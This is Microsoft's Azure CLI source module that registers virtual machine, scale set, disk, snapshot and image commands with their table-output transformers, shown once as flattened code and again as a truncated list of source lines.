parse_resource_id try: output = OrderedDict([('id', result.id), ('resourceGroup', getattr(result, 'resource_group', None) or parse_resource_id(result.id)['resource_group']), ('powerState', result.power_state), ('publicIpAddress', result.public_ips), ('fqdns', result.fqdns), ('privateIpAddress', result.private_ips), ('macAddress', result.mac_addresses), ('location', result.location)]) if getattr(result, 'identity', None): output['identity'] = result.identity return output except AttributeError: from msrest.pipeline import ClientRawResponse return None if isinstance(result, ClientRawResponse) else result def transform_vm_usage_list(result): result = list(result) for item in result: item.current_value = str(item.current_value) item.limit = str(item.limit) item.local_name = item.name.localized_value return result def transform_vm_list(vm_list): return [transform_vm(v) for v in vm_list] # flattern out important fields (single member arrays) to be displayed in the table output def transform_sku_for_table_output(skus): result = [] for k in skus: order_dict = OrderedDict() order_dict['resourceType'] = k['resourceType'] order_dict['locations'] = str(k['locations']) if len(k['locations']) > 1 else k['locations'][0] order_dict['name'] = k['name'] order_dict['size'] = k['size'] order_dict['tier'] = k['tier'] if k['capabilities']: temp = ['{}={}'.format(pair['name'], pair['value']) for pair in k['capabilities']] order_dict['capabilities'] = str(temp) if len(temp) > 1 else temp[0] else: order_dict['capabilities'] = None if k['restrictions']: reasons = [x['reasonCode'] for x in k['restrictions']] order_dict['restrictions'] = str(reasons) if len(reasons) > 1 else reasons[0] else: order_dict['restrictions'] = None result.append(order_dict) return result op_var = 'virtual_machines_operations' op_class = 'VirtualMachinesOperations' cli_command(__name__, 'vm create', custom_path.format('create_vm'), transform=transform_vm_create_output, no_wait_param='no_wait', exception_handler=handle_long_running_operation_exception, table_transformer=deployment_validate_table_format) cli_command(__name__, 'vm delete', mgmt_path.format(op_var, op_class, 'delete'), cf_vm, confirmation=True, no_wait_param='raw') cli_command(__name__, 'vm deallocate', mgmt_path.format(op_var, op_class, 'deallocate'), cf_vm, no_wait_param='raw') cli_command(__name__, 'vm generalize', mgmt_path.format(op_var, op_class, 'generalize'), cf_vm, no_wait_param='raw') cli_command(__name__, 'vm show', custom_path.format('show_vm'), table_transformer=transform_vm, exception_handler=empty_on_404) cli_command(__name__, 'vm list-vm-resize-options', mgmt_path.format(op_var, op_class, 'list_available_sizes'), cf_vm) cli_command(__name__, 'vm stop', mgmt_path.format(op_var, op_class, 'power_off'), cf_vm, no_wait_param='raw') cli_command(__name__, 'vm restart', mgmt_path.format(op_var, op_class, 'restart'), cf_vm, no_wait_param='raw') cli_command(__name__, 'vm start', mgmt_path.format(op_var, op_class, 'start'), cf_vm, no_wait_param='raw') cli_command(__name__, 'vm redeploy', mgmt_path.format(op_var, op_class, 'redeploy'), cf_vm, no_wait_param='raw') cli_command(__name__, 'vm list-ip-addresses', custom_path.format('list_ip_addresses'), table_transformer=transform_ip_addresses) cli_command(__name__, 'vm get-instance-view', custom_path.format('get_instance_view'), table_transformer='{Name:name, ResourceGroup:resourceGroup, Location:location, ProvisioningState:provisioningState, PowerState:instanceView.statuses[1].displayStatus}') cli_command(__name__, 'vm list', custom_path.format('list_vm'), table_transformer=transform_vm_list) cli_command(__name__, 'vm resize', custom_path.format('resize_vm'), no_wait_param='no_wait') cli_command(__name__, 'vm capture', custom_path.format('capture_vm')) cli_command(__name__, 'vm open-port', custom_path.format('vm_open_port')) cli_command(__name__, 'vm format-secret', custom_path.format('get_vm_format_secret')) cli_generic_update_command(__name__, 'vm update', mgmt_path.format(op_var, op_class, 'get'), mgmt_path.format(op_var, op_class, 'create_or_update'), cf_vm, no_wait_param='raw') cli_generic_wait_command(__name__, 'vm wait', 'azure.cli.command_modules.vm.custom#get_instance_view') if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2016-04-30-preview'): cli_command(__name__, 'vm convert', mgmt_path.format(op_var, op_class, 'convert_to_managed_disks'), cf_vm) # VM encryption cli_command(__name__, 'vm encryption enable', 'azure.cli.command_modules.vm.disk_encryption#encrypt_vm') cli_command(__name__, 'vm encryption disable', 'azure.cli.command_modules.vm.disk_encryption#decrypt_vm') cli_command(__name__, 'vm encryption show', 'azure.cli.command_modules.vm.disk_encryption#show_vm_encryption_status', exception_handler=empty_on_404) # VMSS encryption if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'): cli_command(__name__, 'vmss encryption enable', 'azure.cli.command_modules.vm.disk_encryption#encrypt_vmss') cli_command(__name__, 'vmss encryption disable', 'azure.cli.command_modules.vm.disk_encryption#decrypt_vmss') cli_command(__name__, 'vmss encryption show', 'azure.cli.command_modules.vm.disk_encryption#show_vmss_encryption_status', exception_handler=empty_on_404) # VM NIC cli_command(__name__, 'vm nic add', custom_path.format('vm_add_nics')) cli_command(__name__, 'vm nic remove', custom_path.format('vm_remove_nics')) cli_command(__name__, 'vm nic set', custom_path.format('vm_set_nics')) cli_command(__name__, 'vm nic show', custom_path.format('vm_show_nic'), exception_handler=empty_on_404) cli_command(__name__, 'vm nic list', custom_path.format('vm_list_nics')) # VMSS NIC cli_command(__name__, 'vmss nic list', 'azure.mgmt.network.operations.network_interfaces_operations#NetworkInterfacesOperations.list_virtual_machine_scale_set_network_interfaces', cf_ni) cli_command(__name__, 'vmss nic list-vm-nics', 'azure.mgmt.network.operations.network_interfaces_operations#NetworkInterfacesOperations.list_virtual_machine_scale_set_vm_network_interfaces', cf_ni) cli_command(__name__, 'vmss nic show', 'azure.mgmt.network.operations.network_interfaces_operations#NetworkInterfacesOperations.get_virtual_machine_scale_set_network_interface', cf_ni, exception_handler=empty_on_404) # VM Access cli_command(__name__, 'vm user update', custom_path.format('set_user'), no_wait_param='no_wait') cli_command(__name__, 'vm user delete', custom_path.format('delete_user'), no_wait_param='no_wait') cli_command(__name__, 'vm user reset-ssh', custom_path.format('reset_linux_ssh'), no_wait_param='no_wait') # # VM Availability Set cli_command(__name__, 'vm availability-set create', custom_path.format('create_av_set'), exception_handler=handle_long_running_operation_exception, table_transformer=deployment_validate_table_format, no_wait_param='no_wait') op_var = 'availability_sets_operations' op_class = 'AvailabilitySetsOperations' cli_command(__name__, 'vm availability-set delete', mgmt_path.format(op_var, op_class, 'delete'), cf_avail_set) cli_command(__name__, 'vm availability-set show', mgmt_path.format(op_var, op_class, 'get'), cf_avail_set, exception_handler=empty_on_404) cli_command(__name__, 'vm availability-set list', mgmt_path.format(op_var, op_class, 'list'), cf_avail_set) cli_command(__name__, 'vm availability-set list-sizes', mgmt_path.format(op_var, op_class, 'list_available_sizes'), cf_avail_set) if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2016-04-30-preview'): cli_command(__name__, 'vm availability-set convert', custom_path.format('convert_av_set_to_managed_disk')) cli_generic_update_command(__name__, 'vm availability-set update', custom_path.format('availset_get'), custom_path.format('availset_set')) cli_generic_update_command(__name__, 'vmss update', custom_path.format('vmss_get'), custom_path.format('vmss_set'), no_wait_param='no_wait') cli_generic_wait_command(__name__, 'vmss wait', custom_path.format('vmss_get')) # VM Boot Diagnostics cli_command(__name__, 'vm boot-diagnostics disable', custom_path.format('disable_boot_diagnostics')) cli_command(__name__, 'vm boot-diagnostics enable', custom_path.format('enable_boot_diagnostics')) cli_command(__name__, 'vm boot-diagnostics get-boot-log', custom_path.format('get_boot_log')) # VM Diagnostics cli_command(__name__, 'vm diagnostics set', custom_path.format('set_diagnostics_extension')) cli_command(__name__, 'vm diagnostics get-default-config', custom_path.format('show_default_diagnostics_configuration')) # VMSS Diagnostics cli_command(__name__, 'vmss diagnostics set', custom_path.format('set_vmss_diagnostics_extension')) cli_command(__name__, 'vmss diagnostics get-default-config', custom_path.format('show_default_diagnostics_configuration')) if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'): cli_command(__name__, 'vm disk attach', custom_path.format('attach_managed_data_disk')) cli_command(__name__, 'vm disk detach', custom_path.format('detach_data_disk')) if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'): cli_command(__name__, 'vmss disk attach', custom_path.format('attach_managed_data_disk_to_vmss')) cli_command(__name__, 'vmss disk detach', custom_path.format('detach_disk_from_vmss')) cli_command(__name__, 'vm unmanaged-disk attach', custom_path.format('attach_unmanaged_data_disk')) cli_command(__name__, 'vm unmanaged-disk detach', custom_path.format('detach_data_disk')) cli_command(__name__, 'vm unmanaged-disk list', custom_path.format('list_unmanaged_disks')) # VM Extension op_var = 'virtual_machine_extensions_operations' op_class = 'VirtualMachineExtensionsOperations' cli_command(__name__, 'vm extension delete', mgmt_path.format(op_var, op_class, 'delete'), cf_vm_ext) _extension_show_transform = '{Name:name, ProvisioningState:provisioningState, Publisher:publisher, Version:typeHandlerVersion, AutoUpgradeMinorVersion:autoUpgradeMinorVersion}' cli_command(__name__, 'vm extension show', mgmt_path.format(op_var, op_class, 'get'), cf_vm_ext, exception_handler=empty_on_404, table_transformer=_extension_show_transform) cli_command(__name__, 'vm extension set', custom_path.format('set_extension')) cli_command(__name__, 'vm extension list', custom_path.format('list_extensions'), table_transformer='[].' + _extension_show_transform) # VMSS Extension cli_command(__name__, 'vmss extension delete', custom_path.format('delete_vmss_extension')) cli_command(__name__, 'vmss extension show', custom_path.format('get_vmss_extension'), exception_handler=empty_on_404) cli_command(__name__, 'vmss extension set', custom_path.format('set_vmss_extension')) cli_command(__name__, 'vmss extension list', custom_path.format('list_vmss_extensions')) # VM Extension Image op_var = 'virtual_machine_extension_images_operations' op_class = 'VirtualMachineExtensionImagesOperations' cli_command(__name__, 'vm extension image show', mgmt_path.format(op_var, op_class, 'get'), cf_vm_ext_image, exception_handler=empty_on_404) cli_command(__name__, 'vm extension image list-names', mgmt_path.format(op_var, op_class, 'list_types'), cf_vm_ext_image) cli_command(__name__, 'vm extension image list-versions', mgmt_path.format(op_var, op_class, 'list_versions'), cf_vm_ext_image) cli_command(__name__, 'vm extension image list', custom_path.format('list_vm_extension_images')) # VMSS Extension Image (convenience copy of VM Extension Image) cli_command(__name__, 'vmss extension image show', mgmt_path.format(op_var, op_class, 'get'), cf_vm_ext_image, exception_handler=empty_on_404) cli_command(__name__, 'vmss extension image list-names', mgmt_path.format(op_var, op_class, 'list_types'), cf_vm_ext_image) cli_command(__name__, 'vmss extension image list-versions', mgmt_path.format(op_var, op_class, 'list_versions'), cf_vm_ext_image) cli_command(__name__, 'vmss extension image list', custom_path.format('list_vm_extension_images')) # VM Image op_var = 'virtual_machine_images_operations' op_class = 'VirtualMachineImagesOperations' cli_command(__name__, 'vm image show', mgmt_path.format(op_var, op_class, 'get'), cf_vm_image, exception_handler=empty_on_404) cli_command(__name__, 'vm image list-offers', mgmt_path.format(op_var, op_class, 'list_offers'), cf_vm_image) cli_command(__name__, 'vm image list-publishers', mgmt_path.format(op_var, op_class, 'list_publishers'), cf_vm_image) cli_command(__name__, 'vm image list-skus', mgmt_path.format(op_var, op_class, 'list_skus'), cf_vm_image) cli_command(__name__, 'vm image list', custom_path.format('list_vm_images')) # VM Usage cli_command(__name__, 'vm list-usage', mgmt_path.format('usage_operations', 'UsageOperations', 'list'), cf_usage, transform=transform_vm_usage_list, table_transformer='[].{Name:localName, CurrentValue:currentValue, Limit:limit}') # VMSS vmss_show_table_transform = '{Name:name, ResourceGroup:resourceGroup, Location:location, Capacity:sku.capacity, Overprovision:overprovision, upgradePolicy:upgradePolicy.mode}' cli_command(__name__, 'vmss delete', mgmt_path.format('virtual_machine_scale_sets_operations', 'VirtualMachineScaleSetsOperations', 'delete'), cf_vmss, no_wait_param='raw') cli_command(__name__, 'vmss list-skus', mgmt_path.format('virtual_machine_scale_sets_operations', 'VirtualMachineScaleSetsOperations', 'list_skus'), cf_vmss) cli_command(__name__, 'vmss list-instances', mgmt_path.format('virtual_machine_scale_set_vms_operations', 'VirtualMachineScaleSetVMsOperations', 'list'), cf_vmss_vm) cli_command(__name__, 'vmss create', custom_path.format('create_vmss'), transform=DeploymentOutputLongRunningOperation('Starting vmss create'), no_wait_param='no_wait', exception_handler=handle_long_running_operation_exception, table_transformer=deployment_validate_table_format) cli_command(__name__, 'vmss deallocate', custom_path.format('deallocate_vmss'), no_wait_param='no_wait') cli_command(__name__, 'vmss delete-instances', custom_path.format('delete_vmss_instances'), no_wait_param='no_wait') cli_command(__name__, 'vmss get-instance-view', custom_path.format('get_vmss_instance_view'), table_transformer='{ProvisioningState:statuses[0].displayStatus, PowerState:statuses[1].displayStatus}') cli_command(__name__, 'vmss show', custom_path.format('show_vmss'), exception_handler=empty_on_404, table_transformer=vmss_show_table_transform) cli_command(__name__, 'vmss list', custom_path.format('list_vmss'), table_transformer='[].' + vmss_show_table_transform) cli_command(__name__, 'vmss stop', custom_path.format('stop_vmss'), no_wait_param='no_wait') cli_command(__name__, 'vmss restart', custom_path.format('restart_vmss'), no_wait_param='no_wait') cli_command(__name__, 'vmss start', custom_path.format('start_vmss'), no_wait_param='no_wait') cli_command(__name__, 'vmss update-instances', custom_path.format('update_vmss_instances'), no_wait_param='no_wait') if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'): cli_command(__name__, 'vmss reimage', custom_path.format('reimage_vmss'), no_wait_param='no_wait') cli_command(__name__, 'vmss scale', custom_path.format('scale_vmss'), no_wait_param='no_wait') cli_command(__name__, 'vmss list-instance-connection-info', custom_path.format('list_vmss_instance_connection_info')) cli_command(__name__, 'vmss list-instance-public-ips', custom_path.format('list_vmss_instance_public_ips')) # VM Size cli_command(__name__, 'vm list-sizes', mgmt_path.format('virtual_machine_sizes_operations', 'VirtualMachineSizesOperations', 'list'), cf_vm_sizes) if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'): # VM Disk op_var = 'disks_operations' op_class = 'DisksOperations' cli_command(__name__, 'disk create', custom_path.format('create_managed_disk'), no_wait_param='no_wait') cli_command(__name__, 'disk list', custom_path.format('list_managed_disks')) cli_command(__name__, 'disk show', mgmt_path.format(op_var, op_class, 'get'), cf_disks, exception_handler=empty_on_404) cli_command(__name__, 'disk delete', mgmt_path.format(op_var, op_class, 'delete'), cf_disks, no_wait_param='raw', confirmation=True) cli_command(__name__, 'disk grant-access', custom_path.format('grant_disk_access')) cli_command(__name__, 'disk revoke-access', mgmt_path.format(op_var, op_class, 'revoke_access'), cf_disks) cli_generic_update_command(__name__, 'disk update', 'azure.mgmt.compute.compute.operations.{}#{}.get'.format(op_var, op_class), 'azure.mgmt.compute.compute.operations.{}#{}.create_or_update'.format(op_var, op_class), custom_function_op=custom_path.format('update_managed_disk'), setter_arg_name='disk', factory=cf_disks, no_wait_param='raw') cli_generic_wait_command(__name__, 'disk wait', 'azure.mgmt.compute.compute.operations.{}#{}.get'.format(op_var, op_class), cf_disks) op_var = 'snapshots_operations' op_class = 'SnapshotsOperations' cli_command(__name__, 'snapshot create', custom_path.format('create_snapshot')) cli_command(__name__, 'snapshot list', custom_path.format('list_snapshots')) cli_command(__name__, 'snapshot show', mgmt_path.format(op_var, op_class, 'get'), cf_snapshots, exception_handler=empty_on_404) cli_command(__name__, 'snapshot delete', mgmt_path.format(op_var, op_class, 'delete'), cf_snapshots) cli_command(__name__, 'snapshot grant-access', custom_path.format('grant_snapshot_access')) cli_command(__name__, 'snapshot revoke-access', mgmt_path.format(op_var, op_class, 'revoke_access'), cf_snapshots) cli_generic_update_command(__name__, 'snapshot update', 'azure.mgmt.compute.compute.operations.{}#{}.get'.format(op_var, op_class), 'azure.mgmt.compute.compute.operations.{}#{}.create_or_update'.format(op_var, op_class), custom_function_op=custom_path.format('update_snapshot'), setter_arg_name='snapshot', factory=cf_snapshots) op_var = 'images_operations' op_class = 'ImagesOperations' cli_command(__name__, 'image create', custom_path.format('create_image')) cli_command(__name__, 'image list', custom_path.format('list_images')) cli_command(__name__, 'image show', mgmt_path.format(op_var, op_class, 'get'), cf_images, exception_handler=empty_on_404) cli_command(__name__, 'image delete', mgmt_path.format(op_var, op_class, 'delete'), cf_images) if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'): cli_command(__name__, 'vm list-skus', custom_path.format('list_skus'), table_transformer=transform_sku_for_table_output) op_var = 'virtual_machine_run_commands_operations' op_class = 'VirtualMachineRunCommandsOperations' cli_command(__name__, 'vm run-command show', mgmt_path.format(op_var, op_class, 'get'), cf_run_commands) cli_command(__name__, 'vm run-command list', mgmt_path.format(op_var, op_class, 'list'), cf_run_commands) cli_command(__name__, 'vm run-command invoke', custom_path.format('run_command_invoke')) # MSI cli_command(__name__, 'vm assign-identity', custom_path.format('assign_vm_identity')) cli_command(__name__, 'vmss assign-identity', custom_path.format('assign_vmss_identity'))
[ "# --------------------------------------------------------------------------------------------\n", "# Copyright (c) Microsoft Corporation. All rights reserved.\n", "# Licensed under the MIT License. See License.txt in the project root for license information.\n", "# --------------------------------------------------------------------------------------------\n", "\n", "from collections import OrderedDict\n", "\n", "from azure.cli.command_modules.vm._client_factory import (cf_vm, cf_avail_set, cf_ni,\n", " cf_vm_ext,\n", " cf_vm_ext_image, cf_vm_image, cf_usage,\n", " cf_vmss, cf_vmss_vm,\n", " cf_vm_sizes, cf_disks, cf_snapshots,\n", " cf_images, cf_run_commands)\n", "from azure.cli.core.commands import DeploymentOutputLongRunningOperation, cli_command\n", "from azure.cli.core.commands.arm import \\\n", " (cli_generic_update_command, cli_generic_wait_command, handle_long_running_operation_exception,\n", " deployment_validate_table_format)\n", "from azure.cli.core.util import empty_on_404\n", "from azure.cli.core.profiles import supported_api_version, ResourceType\n", "\n", "# pylint: disable=line-too-long\n", "\n", "custom_path = 'azure.cli.command_modules.vm.custom#{}'\n", "mgmt_path = 'azure.mgmt.compute.compute.operations.{}#{}.{}'\n", "\n", "\n", "# VM\n", "def transform_ip_addresses(result):\n", " transformed = []\n", " for r in result:\n", " network = r['virtualMachine']['network']\n", " public = network.get('publicIpAddresses')\n", " public_ip_addresses = ','.join([p['ipAddress'] for p in public if p['ipAddress']]) if public else None\n", " private = network.get('privateIpAddresses')\n", " private_ip_addresses = ','.join(private) if private else None\n", " entry = OrderedDict([('virtualMachine', r['virtualMachine']['name']),\n", " ('publicIPAddresses', public_ip_addresses),\n", " ('privateIPAddresses', private_ip_addresses)])\n", " transformed.append(entry)\n", "\n", " return transformed\n", "\n", "\n", "def transform_vm(result):\n", " return OrderedDict([('name', result['name']),\n", " ('resourceGroup', result['resourceGroup']),\n", " ('powerState', result.get('powerState')),\n", " ('publicIps', result.get('publicIps')),\n", " ('fqdns', result.get('fqdns')),\n", " ('location', result['location'])])\n", "\n", "\n", "def transform_vm_create_output(result):\n", " from azure.cli.core.commands.arm import parse_resource_id\n", " try:\n", " output = OrderedDict([('id', result.id),\n", " ('resourceGroup', getattr(result, 'resource_group', None) or parse_resource_id(result.id)['resource_group']),\n", " ('powerState', result.power_state),\n", " ('publicIpAddress', result.public_ips),\n", " ('fqdns', result.fqdns),\n", " ('privateIpAddress', result.private_ips),\n", " ('macAddress', result.mac_addresses),\n", " ('location', result.location)])\n", " if getattr(result, 'identity', None):\n", " output['identity'] = result.identity\n", " return output\n", " except AttributeError:\n", " from msrest.pipeline import ClientRawResponse\n", " return None if isinstance(result, ClientRawResponse) else result\n", "\n", "\n", "def transform_vm_usage_list(result):\n", " result = list(result)\n", " for item in result:\n", " item.current_value = str(item.current_value)\n", " item.limit = str(item.limit)\n", " item.local_name = item.name.localized_value\n", " return result\n", "\n", "\n", "def transform_vm_list(vm_list):\n", " return [transform_vm(v) for v in vm_list]\n", "\n", "\n", "# flattern out important fields (single member arrays) to be displayed in the table output\n", "def transform_sku_for_table_output(skus):\n", " result = []\n", " for k in skus:\n", " order_dict = OrderedDict()\n", " order_dict['resourceType'] = k['resourceType']\n", " order_dict['locations'] = str(k['locations']) if len(k['locations']) > 1 else k['locations'][0]\n", " order_dict['name'] = k['name']\n", " order_dict['size'] = k['size']\n", " order_dict['tier'] = k['tier']\n", " if k['capabilities']:\n", " temp = ['{}={}'.format(pair['name'], pair['value']) for pair in k['capabilities']]\n", " order_dict['capabilities'] = str(temp) if len(temp) > 1 else temp[0]\n", " else:\n", " order_dict['capabilities'] = None\n", " if k['restrictions']:\n", " reasons = [x['reasonCode'] for x in k['restrictions']]\n", " order_dict['restrictions'] = str(reasons) if len(reasons) > 1 else reasons[0]\n", " else:\n", " order_dict['restrictions'] = None\n", " result.append(order_dict)\n", " return result\n", "\n", "\n", "op_var = 'virtual_machines_operations'\n", "op_class = 'VirtualMachinesOperations'\n", "cli_command(__name__, 'vm create', custom_path.format('create_vm'), transform=transform_vm_create_output, no_wait_param='no_wait', exception_handler=handle_long_running_operation_exception, table_transformer=deployment_validate_table_format)\n", "cli_command(__name__, 'vm delete', mgmt_path.format(op_var, op_class, 'delete'), cf_vm, confirmation=True, no_wait_param='raw')\n", "cli_command(__name__, 'vm deallocate', mgmt_path.format(op_var, op_class, 'deallocate'), cf_vm, no_wait_param='raw')\n", "cli_command(__name__, 'vm generalize', mgmt_path.format(op_var, op_class, 'generalize'), cf_vm, no_wait_param='raw')\n", "cli_command(__name__, 'vm show', custom_path.format('show_vm'), table_transformer=transform_vm, exception_handler=empty_on_404)\n", "cli_command(__name__, 'vm list-vm-resize-options', mgmt_path.format(op_var, op_class, 'list_available_sizes'), cf_vm)\n", "cli_command(__name__, 'vm stop', mgmt_path.format(op_var, op_class, 'power_off'), cf_vm, no_wait_param='raw')\n", "cli_command(__name__, 'vm restart', mgmt_path.format(op_var, op_class, 'restart'), cf_vm, no_wait_param='raw')\n", "cli_command(__name__, 'vm start', mgmt_path.format(op_var, op_class, 'start'), cf_vm, no_wait_param='raw')\n", "cli_command(__name__, 'vm redeploy', mgmt_path.format(op_var, op_class, 'redeploy'), cf_vm, no_wait_param='raw')\n", "cli_command(__name__, 'vm list-ip-addresses', custom_path.format('list_ip_addresses'), table_transformer=transform_ip_addresses)\n", "cli_command(__name__, 'vm get-instance-view', custom_path.format('get_instance_view'),\n", " table_transformer='{Name:name, ResourceGroup:resourceGroup, Location:location, ProvisioningState:provisioningState, PowerState:instanceView.statuses[1].displayStatus}')\n", "cli_command(__name__, 'vm list', custom_path.format('list_vm'), table_transformer=transform_vm_list)\n", "cli_command(__name__, 'vm resize', custom_path.format('resize_vm'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vm capture', custom_path.format('capture_vm'))\n", "cli_command(__name__, 'vm open-port', custom_path.format('vm_open_port'))\n", "cli_command(__name__, 'vm format-secret', custom_path.format('get_vm_format_secret'))\n", "cli_generic_update_command(__name__, 'vm update',\n", " mgmt_path.format(op_var, op_class, 'get'),\n", " mgmt_path.format(op_var, op_class, 'create_or_update'),\n", " cf_vm,\n", " no_wait_param='raw')\n", "cli_generic_wait_command(__name__, 'vm wait', 'azure.cli.command_modules.vm.custom#get_instance_view')\n", "\n", "if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2016-04-30-preview'):\n", " cli_command(__name__, 'vm convert', mgmt_path.format(op_var, op_class, 'convert_to_managed_disks'), cf_vm)\n", "\n", "# VM encryption\n", "cli_command(__name__, 'vm encryption enable', 'azure.cli.command_modules.vm.disk_encryption#encrypt_vm')\n", "cli_command(__name__, 'vm encryption disable', 'azure.cli.command_modules.vm.disk_encryption#decrypt_vm')\n", "cli_command(__name__, 'vm encryption show', 'azure.cli.command_modules.vm.disk_encryption#show_vm_encryption_status', exception_handler=empty_on_404)\n", "\n", "# VMSS encryption\n", "if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'):\n", " cli_command(__name__, 'vmss encryption enable', 'azure.cli.command_modules.vm.disk_encryption#encrypt_vmss')\n", " cli_command(__name__, 'vmss encryption disable', 'azure.cli.command_modules.vm.disk_encryption#decrypt_vmss')\n", " cli_command(__name__, 'vmss encryption show', 'azure.cli.command_modules.vm.disk_encryption#show_vmss_encryption_status', exception_handler=empty_on_404)\n", "\n", "# VM NIC\n", "cli_command(__name__, 'vm nic add', custom_path.format('vm_add_nics'))\n", "cli_command(__name__, 'vm nic remove', custom_path.format('vm_remove_nics'))\n", "cli_command(__name__, 'vm nic set', custom_path.format('vm_set_nics'))\n", "cli_command(__name__, 'vm nic show', custom_path.format('vm_show_nic'), exception_handler=empty_on_404)\n", "cli_command(__name__, 'vm nic list', custom_path.format('vm_list_nics'))\n", "\n", "# VMSS NIC\n", "cli_command(__name__, 'vmss nic list', 'azure.mgmt.network.operations.network_interfaces_operations#NetworkInterfacesOperations.list_virtual_machine_scale_set_network_interfaces', cf_ni)\n", "cli_command(__name__, 'vmss nic list-vm-nics', 'azure.mgmt.network.operations.network_interfaces_operations#NetworkInterfacesOperations.list_virtual_machine_scale_set_vm_network_interfaces', cf_ni)\n", "cli_command(__name__, 'vmss nic show', 'azure.mgmt.network.operations.network_interfaces_operations#NetworkInterfacesOperations.get_virtual_machine_scale_set_network_interface', cf_ni, exception_handler=empty_on_404)\n", "\n", "# VM Access\n", "cli_command(__name__, 'vm user update', custom_path.format('set_user'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vm user delete', custom_path.format('delete_user'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vm user reset-ssh', custom_path.format('reset_linux_ssh'), no_wait_param='no_wait')\n", "\n", "# # VM Availability Set\n", "cli_command(__name__, 'vm availability-set create', custom_path.format('create_av_set'), exception_handler=handle_long_running_operation_exception, table_transformer=deployment_validate_table_format, no_wait_param='no_wait')\n", "\n", "op_var = 'availability_sets_operations'\n", "op_class = 'AvailabilitySetsOperations'\n", "cli_command(__name__, 'vm availability-set delete', mgmt_path.format(op_var, op_class, 'delete'), cf_avail_set)\n", "cli_command(__name__, 'vm availability-set show', mgmt_path.format(op_var, op_class, 'get'), cf_avail_set, exception_handler=empty_on_404)\n", "cli_command(__name__, 'vm availability-set list', mgmt_path.format(op_var, op_class, 'list'), cf_avail_set)\n", "cli_command(__name__, 'vm availability-set list-sizes', mgmt_path.format(op_var, op_class, 'list_available_sizes'), cf_avail_set)\n", "if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2016-04-30-preview'):\n", " cli_command(__name__, 'vm availability-set convert', custom_path.format('convert_av_set_to_managed_disk'))\n", "\n", "cli_generic_update_command(__name__, 'vm availability-set update',\n", " custom_path.format('availset_get'),\n", " custom_path.format('availset_set'))\n", "\n", "cli_generic_update_command(__name__, 'vmss update',\n", " custom_path.format('vmss_get'),\n", " custom_path.format('vmss_set'),\n", " no_wait_param='no_wait')\n", "cli_generic_wait_command(__name__, 'vmss wait', custom_path.format('vmss_get'))\n", "\n", "# VM Boot Diagnostics\n", "cli_command(__name__, 'vm boot-diagnostics disable', custom_path.format('disable_boot_diagnostics'))\n", "cli_command(__name__, 'vm boot-diagnostics enable', custom_path.format('enable_boot_diagnostics'))\n", "cli_command(__name__, 'vm boot-diagnostics get-boot-log', custom_path.format('get_boot_log'))\n", "\n", "# VM Diagnostics\n", "cli_command(__name__, 'vm diagnostics set', custom_path.format('set_diagnostics_extension'))\n", "cli_command(__name__, 'vm diagnostics get-default-config', custom_path.format('show_default_diagnostics_configuration'))\n", "\n", "# VMSS Diagnostics\n", "cli_command(__name__, 'vmss diagnostics set', custom_path.format('set_vmss_diagnostics_extension'))\n", "cli_command(__name__, 'vmss diagnostics get-default-config', custom_path.format('show_default_diagnostics_configuration'))\n", "\n", "if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'):\n", " cli_command(__name__, 'vm disk attach', custom_path.format('attach_managed_data_disk'))\n", " cli_command(__name__, 'vm disk detach', custom_path.format('detach_data_disk'))\n", "\n", "if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'):\n", " cli_command(__name__, 'vmss disk attach', custom_path.format('attach_managed_data_disk_to_vmss'))\n", " cli_command(__name__, 'vmss disk detach', custom_path.format('detach_disk_from_vmss'))\n", "\n", "cli_command(__name__, 'vm unmanaged-disk attach', custom_path.format('attach_unmanaged_data_disk'))\n", "cli_command(__name__, 'vm unmanaged-disk detach', custom_path.format('detach_data_disk'))\n", "cli_command(__name__, 'vm unmanaged-disk list', custom_path.format('list_unmanaged_disks'))\n", "\n", "# VM Extension\n", "op_var = 'virtual_machine_extensions_operations'\n", "op_class = 'VirtualMachineExtensionsOperations'\n", "cli_command(__name__, 'vm extension delete', mgmt_path.format(op_var, op_class, 'delete'), cf_vm_ext)\n", "_extension_show_transform = '{Name:name, ProvisioningState:provisioningState, Publisher:publisher, Version:typeHandlerVersion, AutoUpgradeMinorVersion:autoUpgradeMinorVersion}'\n", "cli_command(__name__, 'vm extension show', mgmt_path.format(op_var, op_class, 'get'), cf_vm_ext, exception_handler=empty_on_404,\n", " table_transformer=_extension_show_transform)\n", "cli_command(__name__, 'vm extension set', custom_path.format('set_extension'))\n", "cli_command(__name__, 'vm extension list', custom_path.format('list_extensions'),\n", " table_transformer='[].' + _extension_show_transform)\n", "\n", "# VMSS Extension\n", "cli_command(__name__, 'vmss extension delete', custom_path.format('delete_vmss_extension'))\n", "cli_command(__name__, 'vmss extension show', custom_path.format('get_vmss_extension'), exception_handler=empty_on_404)\n", "cli_command(__name__, 'vmss extension set', custom_path.format('set_vmss_extension'))\n", "cli_command(__name__, 'vmss extension list', custom_path.format('list_vmss_extensions'))\n", "\n", "# VM Extension Image\n", "op_var = 'virtual_machine_extension_images_operations'\n", "op_class = 'VirtualMachineExtensionImagesOperations'\n", "cli_command(__name__, 'vm extension image show', mgmt_path.format(op_var, op_class, 'get'), cf_vm_ext_image, exception_handler=empty_on_404)\n", "cli_command(__name__, 'vm extension image list-names', mgmt_path.format(op_var, op_class, 'list_types'), cf_vm_ext_image)\n", "cli_command(__name__, 'vm extension image list-versions', mgmt_path.format(op_var, op_class, 'list_versions'), cf_vm_ext_image)\n", "cli_command(__name__, 'vm extension image list', custom_path.format('list_vm_extension_images'))\n", "\n", "# VMSS Extension Image (convenience copy of VM Extension Image)\n", "cli_command(__name__, 'vmss extension image show', mgmt_path.format(op_var, op_class, 'get'), 